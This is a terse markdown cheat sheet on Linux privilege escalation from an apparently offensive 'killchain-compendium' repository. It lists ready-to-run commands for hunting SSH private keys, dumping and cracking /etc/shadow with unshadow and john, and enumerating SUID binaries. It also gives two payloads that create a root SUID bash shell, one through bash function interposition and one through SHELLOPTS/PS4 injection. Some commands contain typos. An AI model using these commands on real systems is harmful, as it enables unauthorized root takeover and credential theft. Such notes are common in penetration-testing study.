killchain-compendium/post exploitation/priv_esc/docs/linux_priv_esc.md

2.5 KiB

Linux Privilege Escalation

Kernel Exploits

Dirty COW

Stored Keys & Passwords

  • History
  • Environment Variables
  • Config + Dot Files
  • SSH keys
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null

Permissions

  • Weak permissions
  • Umask
  • Unshadow via unshadow /etc/passd /etc/shadow > unshadow.txt and john or hashcat.
    • e.g. john --wordlist=./wordlist --format=crypt hash
  • SUID
    • list
    find / -perm /6000 -ls 2>dev/null
    
  • User specific files
find / -user root -name "*.txt"

Sudo Binary

PATH Hijacking

  • Interpositioning binaries via PATH
    • Look for binaries used in other bins and scripts
    • Interposition name and add the directory in front of $PATH

Bash function

  • Interpositioning of binaries via bash functions
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /path/to/binary
  • Call binary which invokes this function

Environment Variable

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'

Capabilities

Crontab

  • Check cat /etc/crontab
  • Check writable scripts and binaries that are scheduled
  • Check $PATH order

NFS Rootsquash